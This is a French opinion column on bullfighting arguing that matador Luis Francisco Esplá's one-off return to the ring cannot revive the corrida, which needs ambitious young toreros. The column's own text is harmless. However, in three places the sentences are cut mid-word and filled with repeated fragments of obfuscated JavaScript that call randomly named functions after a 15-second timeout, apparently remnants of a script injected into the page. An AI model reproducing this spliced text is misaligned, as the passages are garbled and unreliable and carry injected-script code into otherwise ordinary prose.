SUR LE RETOUR DE ESPLÁ ET LES VRAIS STIMULANTS

Dans l’un des sites taurins les plus visités, je lis les résultats d’un sondage où la majorité des sondés se déclare favorable au retour dans les arènes de Luis Francisco Esplá car il suppose «un stimulant pour la Corrida ». Un stimulant est quelque chose qui provoque un choc, qui se révèle salutaire par la réaction qu’il suscite.

Dire que le retour de Esplá est stimulant pour la Tauromachie signifie que son retour est salutaire par les effets qu’il produit par les effets positifs qu’il peut avoir sur la Corrida par les temps qui courent.

Les raisons qui ont poussé Esplá à porter de nouveau l’habit de lumières –retour, en plus, pour un seul jour- ne concernent que lui-même si elles ne doivent pas être très éloignées de celle qu’avait évoqué Ignacio Sánchez Mejías quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il affirma « qu’on ne meure pas dans les arènes, on meurt à la maison », alors que lui décéderait en piste. Mais qu’il y en ait qui pensent que cette fugace réapparition pourrait être un stimulant pour le spectacle taurin me semble préoccupant car il reflète une méconnaissance de la tauromachie et du moment qu’elle traverse.

En premier lieu, car le fait de ne toréer qu’une seule fois ne peut être qu’une simple anecdote avec une emprise insuffisante pour relancer quoi que ce soit, et par ailleurs, même s’il « revenait pour y rester », la vitamine dont a besoin la tauromachie en ce moment ne peut être administrée avec des capsules de vague à l’âme ou de nostalgie, dont certaines sont périmées, mais avec des marques de nouveaux qui prétendent se faire une place sur le marché.

Le stimulant dont la corrida a besoin n’est pas la sereine maestria du vétéran mais l’ardeur enflammée de celui qui a « faim », de celui qui met en jeu sa jeunesse et son destin pour se confronter aux plus grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ands. Le toreo manque d’aficion démesurée, de folie, de feu, de passion, d’engagement, de volonté de se surpasser. Et cela on ne le retrouve que sur ceux qui portent les nouveaux habits de lumières, chargés d’espoirs et de rêves, des costumes subjugués par le mystère du toreo ; des costumes qui souffrent de ne pouvoir réaliser leur faena avec l’âme livrée à leur muleta, avec leur sentimiento bercé dans leur cape ou avec la foi qui les porte quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and ils s’élancent sans craindre la mort à l’estocade, sur ce taureau qui leur offrira la gloire et l’argent.

Nous n’avons pas besoin de belles ruines, même si nous respectons le courage qu’ils montrèrent, nous avons besoin de nouvelles semences –dont certaines ont déjà germé- pour que la fleur de la tauromachie se hisse pleine de vie et avec l’avenir qu’amène le printemps. Honorer les temps passés, mais tournés vers le futur. Que le passé nous serve comme fondation pour lever de nouveaux édifices en pensant à ce qui vient, un avenir chargé de prodiges inédits, de nouvelles aventures, où la réalité gagne du terrain par rapport à ce qui est improbable et où la Corrida, toujours plus belle, continuera de nous ravir avec qu’elle accouche.

 

Les commentaires sont fermés.